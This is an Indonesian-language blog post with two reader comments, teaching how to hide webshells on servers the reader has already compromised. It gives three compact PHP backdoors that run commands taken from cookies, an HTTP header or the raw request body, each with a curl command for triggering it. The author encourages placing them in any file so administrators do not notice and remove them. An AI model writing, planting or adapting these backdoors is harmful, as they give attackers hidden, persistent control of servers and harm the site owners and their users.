Hidden WebShell - Pixel-Code

Hidden WebShell

Hallo sobat pixel lama nggak upload udah ada yang pernah ke isekai kah? hehe Kali ini gue mau bagiin trick Hidden WebShell, Sedikit penjelasan apa itu WebShell kak? Web Shell (WebShell/Shell) adalah sebuah aplikasi berbasis web yang digunakan untuk mengontrol suatu komputer. Umumnya aplikasi ini digunakan oleh para pencari celah keamanan untuk mengendalikan server yang sudah berhasil dikuasai (membuat backdoor atau mengupload file-file). Nah langsung aja mungkin kalian pernah shell kalian seringkali terhapus oleh admin? Walaupun shell kalian sudah kalian hidden sedemikian mungkin?, Oke pada tutorial kali ini mungkin trik ini bisa menjadi referensi kalian, Disini saya akan membagikan trik Hidden Webshell, Sebelumnya saya tau dari mas Verry aka ./Versailles jadi dibuat postingan aja deh.

Langsung yuk simak gimana caranya stepnya, Dan kalian cukup copy source code dibawah :

*Code :
<?=extract($_COOKIE);@$F($C);?>

*Access :
curl -b "F=system;C=uname -a" http://target-website.com/namafile.php

*Code :
<?php 
assert_options(ASSERT_WARNING, 0);
assert(eval(getenv('HTTP_CODE')));?>

*Access :
curl -H "Code: system('uname -a');" http://target-website.com/namafile.php
*Code :
<?php eval('?>' . file_get_contents('php://input'));

*Access :
curl -d "<?=system('uname -a');" http://target-website.com/namafile.php

Nb: Trick diatas bisa kalian pakai dan taruh di file mana saja. Kecuali adminnya kelewat pro sampe jeli sangat memperhatikan source codenya satu-satu hehe. Oiya cara ini ga berfungsi jika ada disable functionnya berlapis loh ya kayak exec,shell_exec,dsb.

Gimana? Cukup mudah dan gampang bukan jadi anti tikung deh hehe, Oke mungkin cukup sekian, Semoga bermanfaat and dont forget to share and see you next time byee~

2 Responses to "Hidden WebShell"

Emoticon Urutan

  1. Maksudnya bagaimana mas, kita harus tembus dulu adminya ? Hbistuh baru kita tanam script.php di atas ?begitu...

    ReplyDelete
  2. Yups posisinya sudah harus di shell / backdoor

    ReplyDelete